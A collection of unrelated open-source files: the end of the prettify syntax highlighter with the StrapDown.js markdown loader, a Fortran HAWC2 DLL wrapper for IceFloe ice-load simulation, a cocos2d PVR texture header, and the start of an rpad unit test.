shortcutStylePatterns.push([PR_PLAIN,/^\s+/,null,' \r\n\t\xA0']);var punctuation=/^.[^\s\w\.$@\'\"\`\/\\]*/;fallthroughStylePatterns.push([PR_LITERAL,/^@[a-z_$][a-z_$@0-9]*/i,null],[PR_TYPE,/^(?:[@_]?[A-Z]+[a-z][A-Za-z_$@0-9]*|\w+_t\b)/,null],[PR_PLAIN,/^[a-z_$][a-z_$@0-9]*/i,null],[PR_LITERAL,new RegExp('^(?:'
+'0x[a-f0-9]+'
+'|(?:\\d(?:_\\d+)*\\d*(?:\\.\\d*)?|\\.\\d\\+)'
+'(?:e[+\\-]?\\d+)?'
+')'
+'[a-z]*','i'),null,'0123456789'],[PR_PLAIN,/^\\[\s\S]?/,null],[PR_PUNCTUATION,punctuation,null]);return createSimpleLexer(shortcutStylePatterns,fallthroughStylePatterns);}
var decorateSource=sourceDecorator({'keywords':ALL_KEYWORDS,'hashComments':true,'cStyleComments':true,'multiLineStrings':true,'regexLiterals':true});function numberLines(node,opt_startLineNum,isPreformatted){var nocode=/(?:^|\s)nocode(?:\s|$)/;var lineBreak=/\r\n?|\n/;var document=node.ownerDocument;var li=document.createElement('li');while(node.firstChild){li.appendChild(node.firstChild);}
var listItems=[li];function walk(node){switch(node.nodeType){case 1:if(nocode.test(node.className)){break;}
if('br'===node.nodeName){breakAfter(node);if(node.parentNode){node.parentNode.removeChild(node);}}else{for(var child=node.firstChild;child;child=child.nextSibling){walk(child);}}
break;case 3:case 4:if(isPreformatted){var text=node.nodeValue;var match=text.match(lineBreak);if(match){var firstLine=text.substring(0,match.index);node.nodeValue=firstLine;var tail=text.substring(match.index+match[0].length);if(tail){var parent=node.parentNode;parent.insertBefore(document.createTextNode(tail),node.nextSibling);}
breakAfter(node);if(!firstLine){node.parentNode.removeChild(node);}}}
break;}}
function breakAfter(lineEndNode){while(!lineEndNode.nextSibling){lineEndNode=lineEndNode.parentNode;if(!lineEndNode){return;}}
function breakLeftOf(limit,copy){var rightSide=copy?limit.cloneNode(false):limit;var parent=limit.parentNode;if(parent){var parentClone=breakLeftOf(parent,1);var next=limit.nextSibling;parentClone.appendChild(rightSide);for(var sibling=next;sibling;sibling=next){next=sibling.nextSibling;parentClone.appendChild(sibling);}}
return rightSide;}
var copiedListItem=breakLeftOf(lineEndNode.nextSibling,0);for(var parent;(parent=copiedListItem.parentNode)&&parent.nodeType===1;){copiedListItem=parent;}
listItems.push(copiedListItem);}
for(var i=0;i<listItems.length;++i){walk(listItems[i]);}
if(opt_startLineNum===(opt_startLineNum|0)){listItems[0].setAttribute('value',opt_startLineNum);}
var ol=document.createElement('ol');ol.className='linenums';var offset=Math.max(0,((opt_startLineNum-1))|0)||0;for(var i=0,n=listItems.length;i<n;++i){li=listItems[i];li.className='L'+((i+offset)%10);if(!li.firstChild){li.appendChild(document.createTextNode('\xA0'));}
ol.appendChild(li);}
node.appendChild(ol);}
function recombineTagsAndDecorations(job){var isIE8OrEarlier=/\bMSIE\s(\d+)/.exec(navigator.userAgent);isIE8OrEarlier=isIE8OrEarlier&&+isIE8OrEarlier[1]<=8;var newlineRe=/\n/g;var source=job.sourceCode;var sourceLength=source.length;var sourceIndex=0;var spans=job.spans;var nSpans=spans.length;var spanIndex=0;var decorations=job.decorations;var nDecorations=decorations.length;var decorationIndex=0;decorations[nDecorations]=sourceLength;var decPos,i;for(i=decPos=0;i<nDecorations;){if(decorations[i]!==decorations[i+2]){decorations[decPos++]=decorations[i++];decorations[decPos++]=decorations[i++];}else{i+=2;}}
nDecorations=decPos;for(i=decPos=0;i<nDecorations;){var startPos=decorations[i];var startDec=decorations[i+1];var end=i+2;while(end+2<=nDecorations&&decorations[end+1]===startDec){end+=2;}
decorations[decPos++]=startPos;decorations[decPos++]=startDec;i=end;}
nDecorations=decorations.length=decPos;var sourceNode=job.sourceNode;var oldDisplay;if(sourceNode){oldDisplay=sourceNode.style.display;sourceNode.style.display='none';}
try{var decoration=null;while(spanIndex<nSpans){var spanStart=spans[spanIndex];var spanEnd=spans[spanIndex+2]||sourceLength;var decEnd=decorations[decorationIndex+2]||sourceLength;var end=Math.min(spanEnd,decEnd);var textNode=spans[spanIndex+1];var styledText;if(textNode.nodeType!==1&&(styledText=source.substring(sourceIndex,end))){if(isIE8OrEarlier){styledText=styledText.replace(newlineRe,'\r');}
textNode.nodeValue=styledText;var document=textNode.ownerDocument;var span=document.createElement('span');span.className=decorations[decorationIndex+1];var parentNode=textNode.parentNode;parentNode.replaceChild(span,textNode);span.appendChild(textNode);if(sourceIndex<spanEnd){spans[spanIndex+1]=textNode=document.createTextNode(source.substring(end,spanEnd));parentNode.insertBefore(textNode,span.nextSibling);}}
sourceIndex=end;if(sourceIndex>=spanEnd){spanIndex+=2;}
if(sourceIndex>=decEnd){decorationIndex+=2;}}}finally{if(sourceNode){sourceNode.style.display=oldDisplay;}}}
var langHandlerRegistry={};function registerLangHandler(handler,fileExtensions){for(var i=fileExtensions.length;--i>=0;){var ext=fileExtensions[i];if(!langHandlerRegistry.hasOwnProperty(ext)){langHandlerRegistry[ext]=handler;}else if(win['console']){console['warn']('cannot override language handler %s',ext);}}}
function langHandlerForExtension(extension,source){if(!(extension&&langHandlerRegistry.hasOwnProperty(extension))){extension=/^\s*</.test(source)?'default-markup':'default-code';}
return langHandlerRegistry[extension];}
registerLangHandler(decorateSource,['default-code']);registerLangHandler(createSimpleLexer([],[[PR_PLAIN,/^[^<?]+/],[PR_DECLARATION,/^<!\w[^>]*(?:>|$)/],[PR_COMMENT,/^<\!--[\s\S]*?(?:-\->|$)/],['lang-',/^<\?([\s\S]+?)(?:\?>|$)/],['lang-',/^<%([\s\S]+?)(?:%>|$)/],[PR_PUNCTUATION,/^(?:<[%?]|[%?]>)/],['lang-',/^<xmp\b[^>]*>([\s\S]+?)<\/xmp\b[^>]*>/i],['lang-js',/^<script\b[^>]*>([\s\S]*?)(<\/script\b[^>]*>)/i],['lang-css',/^<style\b[^>]*>([\s\S]*?)(<\/style\b[^>]*>)/i],['lang-in.tag',/^(<\/?[a-z][^<>]*>)/i]]),['default-markup','htm','html','mxml','xhtml','xml','xsl']);registerLangHandler(createSimpleLexer([[PR_PLAIN,/^[\s]+/,null,' \t\r\n'],[PR_ATTRIB_VALUE,/^(?:\"[^\"]*\"?|\'[^\']*\'?)/,null,'\"\'']],[[PR_TAG,/^^<\/?[a-z](?:[\w.:-]*\w)?|\/?>$/i],[PR_ATTRIB_NAME,/^(?!style[\s=]|on)[a-z](?:[\w:-]*\w)?/i],['lang-uq.val',/^=\s*([^>\'\"\s]*(?:[^>\'\"\s\/]|\/(?=\s)))/],[PR_PUNCTUATION,/^[=<>\/]+/],['lang-js',/^on\w+\s*=\s*\"([^\"]+)\"/i],['lang-js',/^on\w+\s*=\s*\'([^\']+)\'/i],['lang-js',/^on\w+\s*=\s*([^\"\'>\s]+)/i],['lang-css',/^style\s*=\s*\"([^\"]+)\"/i],['lang-css',/^style\s*=\s*\'([^\']+)\'/i],['lang-css',/^style\s*=\s*([^\"\'>\s]+)/i]]),['in.tag']);registerLangHandler(createSimpleLexer([],[[PR_ATTRIB_VALUE,/^[\s\S]+/]]),['uq.val']);registerLangHandler(sourceDecorator({'keywords':CPP_KEYWORDS,'hashComments':true,'cStyleComments':true,'types':C_TYPES}),['c','cc','cpp','cxx','cyc','m']);registerLangHandler(sourceDecorator({'keywords':'null,true,false'}),['json']);registerLangHandler(sourceDecorator({'keywords':CSHARP_KEYWORDS,'hashComments':true,'cStyleComments':true,'verbatimStrings':true,'types':C_TYPES}),['cs']);registerLangHandler(sourceDecorator({'keywords':JAVA_KEYWORDS,'cStyleComments':true}),['java']);registerLangHandler(sourceDecorator({'keywords':SH_KEYWORDS,'hashComments':true,'multiLineStrings':true}),['bsh','csh','sh']);registerLangHandler(sourceDecorator({'keywords':PYTHON_KEYWORDS,'hashComments':true,'multiLineStrings':true,'tripleQuotedStrings':true}),['cv','py']);registerLangHandler(sourceDecorator({'keywords':PERL_KEYWORDS,'hashComments':true,'multiLineStrings':true,'regexLiterals':true}),['perl','pl','pm']);registerLangHandler(sourceDecorator({'keywords':RUBY_KEYWORDS,'hashComments':true,'multiLineStrings':true,'regexLiterals':true}),['rb']);registerLangHandler(sourceDecorator({'keywords':JSCRIPT_KEYWORDS,'cStyleComments':true,'regexLiterals':true}),['js']);registerLangHandler(sourceDecorator({'keywords':COFFEE_KEYWORDS,'hashComments':3,'cStyleComments':true,'multilineStrings':true,'tripleQuotedStrings':true,'regexLiterals':true}),['coffee']);registerLangHandler(createSimpleLexer([],[[PR_STRING,/^[\s\S]+/]]),['regex']);function applyDecorator(job){var opt_langExtension=job.langExtension;try{var sourceAndSpans=extractSourceSpans(job.sourceNode,job.pre);var source=sourceAndSpans.sourceCode;job.sourceCode=source;job.spans=sourceAndSpans.spans;job.basePos=0;langHandlerForExtension(opt_langExtension,source)(job);recombineTagsAndDecorations(job);}catch(e){if(win['console']){console['log'](e&&e['stack']?e['stack']:e);}}}
function prettyPrintOne(sourceCodeHtml,opt_langExtension,opt_numberLines){var container=document.createElement('pre');container.innerHTML=sourceCodeHtml;if(opt_numberLines){numberLines(container,opt_numberLines,true);}
var job={langExtension:opt_langExtension,numberLines:opt_numberLines,sourceNode:container,pre:1};applyDecorator(job);return container.innerHTML;}
function prettyPrint(opt_whenDone){function byTagName(tn){return document.getElementsByTagName(tn);}
var codeSegments=[byTagName('pre'),byTagName('code'),byTagName('xmp')];var elements=[];for(var i=0;i<codeSegments.length;++i){for(var j=0,n=codeSegments[i].length;j<n;++j){elements.push(codeSegments[i][j]);}}
codeSegments=null;var clock=Date;if(!clock['now']){clock={'now':function(){return+(new Date);}};}
var k=0;var prettyPrintingJob;var langExtensionRe=/\blang(?:uage)?-([\w.]+)(?!\S)/;var prettyPrintRe=/\bprettyprint\b/;var prettyPrintedRe=/\bprettyprinted\b/;var preformattedTagNameRe=/pre|xmp/i;var codeRe=/^code$/i;var preCodeXmpRe=/^(?:pre|code|xmp)$/i;function doWork(){var endTime=(win['PR_SHOULD_USE_CONTINUATION']?clock['now']()+250:Infinity);for(;k<elements.length&&clock['now']()<endTime;k++){var cs=elements[k];var className=cs.className;if(prettyPrintRe.test(className)&&!prettyPrintedRe.test(className)){var nested=false;for(var p=cs.parentNode;p;p=p.parentNode){var tn=p.tagName;if(preCodeXmpRe.test(tn)&&p.className&&prettyPrintRe.test(p.className)){nested=true;break;}}
if(!nested){cs.className+=' prettyprinted';var langExtension=className.match(langExtensionRe);var wrapper;if(!langExtension&&(wrapper=childContentWrapper(cs))&&codeRe.test(wrapper.tagName)){langExtension=wrapper.className.match(langExtensionRe);}
if(langExtension){langExtension=langExtension[1];}
var preformatted;if(preformattedTagNameRe.test(cs.tagName)){preformatted=1;}else{var currentStyle=cs['currentStyle'];var whitespace=(currentStyle?currentStyle['whiteSpace']:(document.defaultView&&document.defaultView.getComputedStyle)?document.defaultView.getComputedStyle(cs,null).getPropertyValue('white-space'):0);preformatted=whitespace&&'pre'===whitespace.substring(0,3);}
var lineNums=cs.className.match(/\blinenums\b(?::(\d+))?/);lineNums=lineNums?lineNums[1]&&lineNums[1].length?+lineNums[1]:true:false;if(lineNums){numberLines(cs,lineNums,preformatted);}
prettyPrintingJob={langExtension:langExtension,sourceNode:cs,numberLines:lineNums,pre:preformatted};applyDecorator(prettyPrintingJob);}}}
if(k<elements.length){setTimeout(doWork,250);}else if(opt_whenDone){opt_whenDone();}}
doWork();}
var PR=win['PR']={'createSimpleLexer':createSimpleLexer,'registerLangHandler':registerLangHandler,'sourceDecorator':sourceDecorator,'PR_ATTRIB_NAME':PR_ATTRIB_NAME,'PR_ATTRIB_VALUE':PR_ATTRIB_VALUE,'PR_COMMENT':PR_COMMENT,'PR_DECLARATION':PR_DECLARATION,'PR_KEYWORD':PR_KEYWORD,'PR_LITERAL':PR_LITERAL,'PR_NOCODE':PR_NOCODE,'PR_PLAIN':PR_PLAIN,'PR_PUNCTUATION':PR_PUNCTUATION,'PR_SOURCE':PR_SOURCE,'PR_STRING':PR_STRING,'PR_TAG':PR_TAG,'PR_TYPE':PR_TYPE,'prettyPrintOne':win['prettyPrintOne']=prettyPrintOne,'prettyPrint':win['prettyPrint']=prettyPrint};if(typeof define==="function"&&define['amd']){define("google-code-prettify",[],function(){return PR;});}})();
;(function(window, document) {
// Hide body until we're done fiddling with the DOM (FIXED")
document.body.style.display = 'none';
//////////////////////////////////////////////////////////////////////
//
// Shims for IE < 9
//
document.head = document.getElementsByTagName('head')[0];
if (!('getElementsByClassName' in document)) {
document.getElementsByClassName = function(name) {
function getElementsByClassName(node, classname) {
var a = [];
var re = new RegExp('(^| )'+classname+'( |$)');
var els = node.getElementsByTagName("*");
for(var i=0,j=els.length; i<j; i++)
if(re.test(els[i].className))a.push(els[i]);
return a;
}
return getElementsByClassName(document.body, name);
}
}
//////////////////////////////////////////////////////////////////////
//
// Get user elements we need
//
var markdownEl = document.getElementsByTagName('xmp')[0] || document.getElementsByTagName('pre')[0] || document.getElementsByTagName('textarea')[0],
titleEl = document.getElementsByTagName('title')[0],
scriptEls = document.getElementsByTagName('script'),
navbarEl = document.getElementsByClassName('navbar')[0];
//////////////////////////////////////////////////////////////////////
//
// <head> stuff
//
// Use <meta> viewport so that Bootstrap is actually responsive on mobile
var metaEl = document.createElement('meta');
metaEl.name = 'viewport';
metaEl.content = 'width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0';
if (document.head.firstChild)
document.head.insertBefore(metaEl, document.head.firstChild);
else
document.head.appendChild(metaEl);
// Get origin of script
var origin = '';
for (var i = 0; i < scriptEls.length; i++) {
if (scriptEls[i].src.match('strapdown')) {
origin = scriptEls[i].src;
}
}
var originBase = origin.substr(0, origin.lastIndexOf('/'));
// Get theme
var theme = markdownEl.getAttribute('theme') || 'bootstrap';
theme = theme.toLowerCase();
// Stylesheets
var linkEl = document.createElement('link');
linkEl.rel = 'stylesheet';
linkEl.href = originBase + '/themes/'+theme+'.min.css?md';
document.head.appendChild(linkEl);
var linkEl = document.createElement('link');
linkEl.rel = 'stylesheet';
linkEl.href = originBase + '/strapdown.css?md';
document.head.appendChild(linkEl);
var linkEl = document.createElement('link');
linkEl.rel = 'stylesheet';
linkEl.href = originBase + '/themes/bootstrap-responsive.min.css?md';
document.head.appendChild(linkEl);
// Favicon
var linkEl = document.createElement('link');
linkEl.rel = 'shortcut icon';
linkEl.href = originBase + '/favicon.png?md';
// linkEl.href = 'https://ga-beacon.appspot.com/UA-38514290-15/strapdown?pixel';
document.head.appendChild(linkEl);
//////////////////////////////////////////////////////////////////////
//
// <body> stuff
//
var markdown = markdownEl.textContent || markdownEl.innerText;
var newNode = document.createElement('div');
newNode.className = 'container';
newNode.id = 'content';
document.body.replaceChild(newNode, markdownEl);
// Insert navbar if there's none
// FIXME be sure THIS is good.
var newNode = document.createElement('div');
newNode.className = 'navbar navbar-fixed-top';
if (!navbarEl && titleEl) {
newNode.innerHTML = '<div class="navbar-inner"> <div class="container"> <div id="headline" class="brand"> </div> '
/* // @HARDLY: dont want
+ '<div id="headline-copyrights" class="brand">(Powered by '
+ '<a title="http://lbo.k.vu/md" href="https://lbesson.bitbucket.org/md/index.html?src=strapdown.js">StrapDown.js</a> v0.4.1 '
+ 'with theme <a title="More information on this theme on bootswatch.com !" href="http://bootswatch.com/'+theme+'">'+theme+'</a>, '
+ 'hosted on <a href="https://bitbucket.org/">BitBucket</a>)</div> '
+ '<div id="headline-squirt" class="brand"> <a title="Check https://lbesson.bitbucket.org/squirt/ for more informations" '
+ 'href="javascript:(function(){sq=window.sq;if(sq&&sq.closed){window.sq.closed&&window.document.dispatchEvent(new Event(\'squirt.again\'));}else{sq=window.sq||{};sq.version=\'0.4\';sq.host=\'https://lbesson.bitbucket.org/squirt\';sq.j=document.createElement(\'script\');sq.j.src=sq.host+\'/squirt.js?src=strapdown.js\';document.body.appendChild(sq.j);}})();" '
+ '>Use Squirt?</a></div> '
*/
+ '</div> </div>';
document.body.insertBefore(newNode, document.body.firstChild);
var title = titleEl.innerHTML;
var headlineEl = document.getElementById('headline');
if (headlineEl)
headlineEl.innerHTML = title;
}
//////////////////////////////////////////////////////////////////////
//
// Markdown!
//
// Generate Markdown
var html = marked(markdown);
document.getElementById('content').innerHTML = html;
// Prettify
var codeEls = document.getElementsByTagName('code');
for (var i=0, ii=codeEls.length; i<ii; i++) {
var codeEl = codeEls[i];
var lang = codeEl.className;
codeEl.className = 'prettyprint lang-' + lang;
}
prettyPrint();
// Style tables
var tableEls = document.getElementsByTagName('table');
for (var i=0, ii=tableEls.length; i<ii; i++) {
var tableEl = tableEls[i];
tableEl.className = 'table table-striped table-bordered';
}
// All done - show body
document.body.style.display = '';
/* // @HARDLY: dont want
// Experimental ga-beacon auto web request
var linkEl = document.createElement('img');
linkEl.alt = 'GA|Analytics';
linkEl.style = 'visibility: hidden; display: none;';
linkEl.src = 'https://ga-beacon.appspot.com/UA-38514290-14/strapdown.js?pixel';
document.body.appendChild(linkEl);
*/
})(window, document);
| {
"pile_set_name": "Github"
} |
!**********************************************************************************************************************************
! LICENSING
! Copyright (C) 2014 DNV KEMA Renewables, Inc.
!
! This file is part of the IceFloe suite of subroutines
!
! Licensed under the Apache License, Version 2.0 (the "License");
! you may not use this file except in compliance with the License.
! You may obtain a copy of the License at
!
! http://www.apache.org/licenses/LICENSE-2.0
!
! Unless required by applicable law or agreed to in writing, software
! distributed under the License is distributed on an "AS IS" BASIS,
! WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
! See the License for the specific language governing permissions and
! limitations under the License.
!************************************************************************
!**********************************************************************************************************************************
! File last committed: $Date: 2014-06-24 10:28:50 -0700 (Tue, 24 Jun 2014) $
! (File) Revision #: $Rev: 150 $
! URL: $HeadURL: http://sel1004.verit.dnv.com:8080/svn/LoadSimCtl_SurfaceIce/trunk/IceDyn_IntelFortran/HAWC2_DLL/HAWC2_DLL.f90 $
!**********************************************************************************************************************************
! DLL to be linked with the HAWC2 Aeroelastic wind turbine simulation
! As a type 2 DLL per the user manual
module HAWC2DLL
use IceLog
use IceInputParams
use iceFloeBase
use IceCrushingISO
use IceCrushingIEC
use IceIntermittentCrushing
use IceFlexISO
use IceFlexIEC
use IceLockInCrushingISO
use randomCrushing
use IceCpldCrushing
use NWTC_IO, only : DispNVD, progdesc, curdate, curtime
TYPE(iceFloe_ParameterType), save :: icep ! Parameters, including precalculated time series
type(iceFloe_LoggingType),save :: theIceLog ! structure with message and error logging variables
end module HAWC2DLL
subroutine icefloe_init (array1, array2)
! Expose subroutine DLL to users of this DLL
!DEC$ ATTRIBUTES DLLEXPORT, C, ALIAS:'icefloe_init' :: icefloe_init
use HAWC2DLL
implicit none
! input
real(8), intent(IN) :: array1(1)
! output
real(8), intent(OUT) :: array2(1)
! locals
Real(ReKi) :: duration
INTEGER(IntKi) :: nSteps
INTEGER(IntKi) :: Err ! Error status of the operation
LOGICAL, SAVE :: bInit = .FALSE. ! Initialization flag
TYPE(ProgDesc), PARAMETER :: IceFloe_Ver = ProgDesc( 'IceFloe', 'v1.00.00', 'May-2014' )
! More IceFloe types
type(iceInputType) :: iceInput ! hold list of input names and values from file
character(132) :: logFile ! File name for message logging
! Initialise on first call
IF (.NOT.bInit) THEN
bInit = .TRUE.
ENDIF
! Set up error logging
theIceLog%warnFlag = .false.
theIceLog%ErrID = ErrID_None
theIceLog%ErrMsg = ""
! Initialize the NWTC Subroutine Library
! CALL NWTC_Init( )
! Display the module information
CALL DispNVD( IceFloe_Ver )
call openIceLog (theIceLog, 'IceFloe.log')
call logMessage(theIceLog, ' Running: '//trim(IceFloe_Ver%Name)//trim(IceFloe_Ver%Ver)//trim(IceFloe_Ver%Date))
call logMessage(theIceLog, ' This run started on: '//curdate()//' at '//curtime()//newLine)
call countIceInputs('testIce.inp', theIceLog, iceInput)
call readIceInputs(theIceLog, iceInput)
call logMessage(theIceLog, ' Input file read complete.'//newLine)
! call IceFloe initialization routine and get parameters back
! not all parameters used by all ice floe types
call getIceInput(iceInput, 'iceType',icep%iceType, theIceLog, lowTypeLimit, hiTypeLimit)
if (theIceLog%ErrID >= AbortErrLev) then
return
endif
! Set the time step as the minimum of the suggested p%dt and the time step from the ice input file
call getIceInput(iceInput, 'timeStep',icep%dt, theIceLog, 0.0)
if (theIceLog%ErrID >= AbortErrLev) then
return
endif
! get the duration of the simulation
call getIceInput(iceInput, 'duration', duration, theIceLog, 0.0)
call logMessage(theIceLog, ' Load time series duration = '//TRIM(Num2LStr(duration))//' sec')
! get the load ramp up time
call getIceInput(iceInput, 'rampTime', icep%rampTime, theIceLog, 0.0)
call logMessage(theIceLog, ' Load ramp up time = '//TRIM(Num2LStr(icep%rampTime))//' sec')
! get the number of legs on the support structure
call getIceInput(iceInput, 'numLegs', icep%numLegs, theIceLog, 1, 4)
if (theIceLog%ErrID >= AbortErrLev) then
return
endif
! allocate storage for load series
nSteps = ceiling(duration/icep%dt) + 1 ! + 1 for zero point
allocate(icep%loadSeries(nSteps, icep%numLegs), stat=err)
if (err /= 0) then
call iceErrorHndlr (theIceLog, ErrID_Fatal, 'Error in time series array allocation in IceFloe_init', 1)
return
endif
! point internal iceFloe array to the saved load series
! icep%loadSeries => loadseries
! allocate storage for the leg positions
allocate (icep%legX(icep%numLegs), stat=err)
allocate (icep%legY(icep%numLegs), stat=err)
allocate (icep%ks(icep%numLegs), stat=err)
if (err /= 0) then
call iceErrorHndlr (theIceLog, ErrID_Fatal, 'Error in allocation of leg data in parameters', 1)
return ! error in array allocation
endif
icep%legX = 0.0
icep%legY = 0.0
icep%ks = 1.0
iceType: select case (icep%iceType)
case (randomCrush)
call initRandomCrushing(iceInput, icep, theIceLog)
if (theIceLog%ErrID <= ErrID_Warn) &
call logMessage(theIceLog, newLine//' Random continuous ice crushing via ISO/Karna initialized'//newLine)
case (interCrush)
call initInterCrushing(iceInput, icep, theIceLog)
if (theIceLog%ErrID <= ErrID_Warn) &
call logMessage(theIceLog, newLine//' Intermittent ice crushing loads initialized'//newLine)
case (crushIEC)
call initCrushingIEC(iceInput, icep, theIceLog)
if (theIceLog%ErrID <= ErrID_Warn) &
call logMessage(theIceLog, newLine//' Ice crushing loads IEC/Korzhavin initialized'//newLine)
case (flexFailISO)
call initFlexISO(iceInput, icep, theIceLog)
if (theIceLog%ErrID <= ErrID_Warn) &
call logMessage(theIceLog, newLine//' ISO/Croasdale ice flexural failure loads initialized'//newLine)
case (flexFailIEC)
call initFlexIEC(iceInput, icep, theIceLog)
if (theIceLog%ErrID <= ErrID_Warn) &
call logMessage(theIceLog, newLine//' IEC/Ralston ice flexural failure loads initialized'//newLine)
case (lockInISO)
call initLockInCrushingISO(iceInput, icep, theIceLog)
if (theIceLog%ErrID <= ErrID_Warn) &
call logMessage(theIceLog, newLine//' Frequency lock-in ice crushing loads via ISO initialized'//newLine)
case (cpldCrush)
call initCpldCrushing(iceInput, icep, theIceLog)
if (theIceLog%ErrID <= ErrID_Warn) &
call logMessage(theIceLog, newLine//' Coupled crushing ice loads (Maattanen) initialized'//newLine)
case default
call iceErrorHndlr (theIceLog, ErrID_Fatal, 'Invalid ice floe type, ' &
//TRIM(Num2LStr(icep%IceType))//' is not a valid selection', 1)
end select iceType
array2 = 0.0d0
end subroutine icefloe_init
SUBROUTINE icefloe_update(array1, array2)
! Expose subroutine DLL to users of this DLL
!DEC$ ATTRIBUTES DLLEXPORT, C, ALIAS:'icefloe_update' :: icefloe_update
use HAWC2DLL
implicit none
! input
real(8), intent(IN) :: array1(1+3*icep%numLegs) ! 1) Time, 2) Vx, 3) Vy, 4) Vz all in HAWC coords
! output
real(8), intent(OUT) :: array2(2*icep%numLegs) ! Fx and Fy (in HAWC coords)
REAL(DbKi) :: t ! Current simulation time in seconds
real(ReKi) :: loadVect(6,icep%numLegs)
real(ReKi) :: inVels(2,icep%numLegs)
integer(IntKi) :: nL
! reset up error logging
theIceLog%warnFlag = .false.
theIceLog%ErrID = ErrID_None
theIceLog%ErrMsg = ""
t = array1(1)
inVels = 0.0
! HAWC has +y axis downwind, x lateral, z + down
! IceFloe has +x axis downwind, y lateral, z + up
do nL = 1, icep%numLegs
inVels(1,nL) = array1(3*nL)
inVels(2,nL) = array1(3*nL-1)
enddo
! get loads from IceFloe
iceType: select case (icep%iceType)
case (randomCrush)
loadVect = outputRandomCrushLoad(icep, theIceLog, t)
case (crushIEC)
loadVect = outputCrushLoadIEC(icep, theIceLog, t)
case (interCrush)
loadVect = outputInterCrushLoad(icep, theIceLog, t)
case (flexFailISO)
loadVect = outputFlexLoadISO(icep, theIceLog, t)
case (flexFailIEC)
loadVect = outputFlexLoadIEC(icep, theIceLog, t)
case (lockInISO)
loadVect = outputLockInLoadISO(icep, theIceLog, t)
case (cpldCrush)
loadVect = outputCpldCrushLoad(icep, theIceLog, inVels, t)
case default
call logFatal (theIceLog, 'Invalid Ice Floe Type Selection', 1)
end select iceType
!TODO deal w/ single point application
!Apply ramp for first 10 seconds
loadVect = loadVect*min(1.0, array1(1)/icep%rampTime)
do nL = 1, icep%numLegs
array2(2*nL-1) = dble(loadVect(2,nL))*min(1.0, 0.1*t)
array2(2*nL) = dble(loadVect(1,nL))*min(1.0, 0.1*t)
enddo
end SUBROUTINE icefloe_update
| {
"pile_set_name": "Github"
} |
/*
File: PVRTexture.h
Abstract: The PVRTexture class is responsible for loading .pvr files.
Version: 1.0
Disclaimer: IMPORTANT: This Apple software is supplied to you by Apple Inc.
("Apple") in consideration of your agreement to the following terms, and your
use, installation, modification or redistribution of this Apple software
constitutes acceptance of these terms. If you do not agree with these terms,
please do not use, install, modify or redistribute this Apple software.
In consideration of your agreement to abide by the following terms, and subject
to these terms, Apple grants you a personal, non-exclusive license, under
Apple's copyrights in this original Apple software (the "Apple Software"), to
use, reproduce, modify and redistribute the Apple Software, with or without
modifications, in source and/or binary forms; provided that if you redistribute
the Apple Software in its entirety and without modifications, you must retain
this notice and the following text and disclaimers in all such redistributions
of the Apple Software.
Neither the name, trademarks, service marks or logos of Apple Inc. may be used
to endorse or promote products derived from the Apple Software without specific
prior written permission from Apple. Except as expressly stated in this notice,
no other rights or licenses, express or implied, are granted by Apple herein,
including but not limited to any patent rights that may be infringed by your
derivative works or by other works in which the Apple Software may be
incorporated.
The Apple Software is provided by Apple on an "AS IS" basis. APPLE MAKES NO
WARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION THE IMPLIED
WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE, REGARDING THE APPLE SOFTWARE OR ITS USE AND OPERATION ALONE OR IN
COMBINATION WITH YOUR PRODUCTS.
IN NO EVENT SHALL APPLE BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
ARISING IN ANY WAY OUT OF THE USE, REPRODUCTION, MODIFICATION AND/OR
DISTRIBUTION OF THE APPLE SOFTWARE, HOWEVER CAUSED AND WHETHER UNDER THEORY OF
CONTRACT, TORT (INCLUDING NEGLIGENCE), STRICT LIABILITY OR OTHERWISE, EVEN IF
APPLE HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Copyright (C) 2008 Apple Inc. All Rights Reserved.
*/
#import <Foundation/Foundation.h>
#import "Platforms/CCGL.h"
#import "CCTexture2D.h"
#pragma mark -
#pragma mark CCTexturePVR
struct CCPVRMipmap {
unsigned char *address;
unsigned int len;
};
enum {
CC_PVRMIPMAP_MAX = 16,
};
/** CCTexturePVR
Object that loads PVR images.
Supported PVR formats:
- RGBA8888
- BGRA8888
- RGBA4444
- RGBA5551
- RGB565
- A8
- I8
- AI88
- PVRTC 4BPP
- PVRTC 2BPP
Limitations:
Pre-generated mipmaps, such as PVR textures with mipmap levels embedded in file,
are only supported if all individual sprites are of _square_ size.
To use mipmaps with non-square textures, instead call CCTexture2D#generateMipmap on the sheet texture itself
(and to save space, save the PVR sprite sheet without mip maps included).
*/
@interface CCTexturePVR : NSObject
{
struct CCPVRMipmap mipmaps_[CC_PVRMIPMAP_MAX]; // pointer to mipmap images
NSUInteger numberOfMipmaps_; // number of mipmap used
unsigned int tableFormatIndex_;
uint32_t width_, height_;
GLuint name_;
BOOL hasAlpha_;
// cocos2d integration
BOOL retainName_;
CCTexture2DPixelFormat format_;
}
/** initializes a CCTexturePVR with a path */
- (id)initWithContentsOfFile:(NSString *)path;
/** initializes a CCTexturePVR with an URL */
- (id)initWithContentsOfURL:(NSURL *)url;
/** creates and initializes a CCTexturePVR with a path */
+ (id)pvrTextureWithContentsOfFile:(NSString *)path;
/** creates and initializes a CCTexturePVR with an URL */
+ (id)pvrTextureWithContentsOfURL:(NSURL *)url;
/** texture id name */
@property (nonatomic,readonly) GLuint name;
/** texture width */
@property (nonatomic,readonly) uint32_t width;
/** texture height */
@property (nonatomic,readonly) uint32_t height;
/** whether or not the texture has alpha */
@property (nonatomic,readonly) BOOL hasAlpha;
/** how many mipmaps the texture has. 1 means one level (level 0 */
@property (nonatomic, readonly) NSUInteger numberOfMipmaps;
// cocos2d integration
@property (nonatomic,readwrite) BOOL retainName;
@property (nonatomic,readonly) CCTexture2DPixelFormat format;
@end
| {
"pile_set_name": "Github"
} |
var equal = require('assert').equal;
var rpad = require('../rpad');
test('#rpad', function() {
equal(rpad('1', 8), '1 ');
equal(rpad(1, 8), '1 ');
equal(rpad('1', 8, '0'), '10000000');
